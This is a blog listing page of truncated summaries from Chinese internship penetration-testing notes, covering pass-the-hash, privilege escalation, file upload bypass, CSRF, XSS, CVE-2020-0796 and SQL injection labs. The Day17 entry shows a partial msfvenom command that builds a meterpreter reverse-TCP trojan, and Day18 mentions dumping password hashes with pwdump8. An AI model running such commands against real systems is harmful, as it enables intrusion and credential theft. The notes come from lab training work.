摘要:
粤嵌科技毕业实习Day18 最后一篇学习内容 pth实战 查看kali攻击机和win7靶机的IP Win7打开本地用户和组,取消administrator的禁用,并且设置密码。 WIN+R lusrmgr.msc WIN7以管理员的身份打开命令行,执行pwdump8,获得所有用户的密码哈希值,其中A 阅读全文
摘要:
粤嵌科技毕业实习Day17 提权 检查网络 kali执行以下代码,生成一个远程控制木马msf.exe。 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.220.128 lport= 阅读全文
摘要:
粤嵌科技毕业实习Day16 文件上传漏洞的检测 客户端js校验(也称前端验证,一般只校验后缀名) 一般都是在网页上写一段javascript脚本,校验上传文件的后缀名,有白名单形式也有黑名单形式。 判断方式:在浏览加载文件,但还未点击上传按钮时便弹出对话框,内容如:只允许上传.jpg/.jpeg/. 阅读全文
摘要:
粤嵌科技毕业实习Day15 CSRF(跨站请求伪造) 1 、用户C打开浏览器,访问受信任网站A,输入用户名和密码请求登录网站A; 2、 在用户信息通过验证后,网站A产生Cookie信息并返回给浏览器,此时用户登录网站A成功,可以正常发送请求到网站A; 3、用户未退出网站A之前,在同一浏览器中,打开一 阅读全文
摘要:
粤嵌科技毕业实习Day14 XSS(跨站脚本攻击) Cross-Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击。攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。利用这些恶意脚本,攻击者可获取用户的敏感信息如 Cookie、SessionID 等,进而危害数 阅读全文
摘要:
粤嵌科技毕业实习Day13 Day12是整理学过的知识 CVE2020-0796漏洞复现 1、虚拟机安装win10:https://blog.csdn.net/dlc_996/article/details/104629203 windows 10纯净版:(建议迅雷下载) ed2k://|file| 阅读全文
摘要:
粤嵌科技毕业实习Day11 宽字节注入 原理 GBK 占用两字节,ASCII占用一字节 函数执行添加的是ASCII编码,MYSQL默认字符集是GBK等宽字节字符集。MySQL在使用GBK编码的时候,会认为两个字符是一个汉字,前提是前一个字符的 ASCII 值大于128,才会认为是汉字。 宽字节注入源 阅读全文
摘要:
粤嵌科技毕业实习Day10 注意:firefox和burp suite是配套使用的 post注入 Less-11 1、进入Less-11 都输入1,没有得到有用信息 2、打开burp suit抓包 可以知道uname和passwd是账户、密码分别对应的参数。将请求发送到repeater模块,进行下一 阅读全文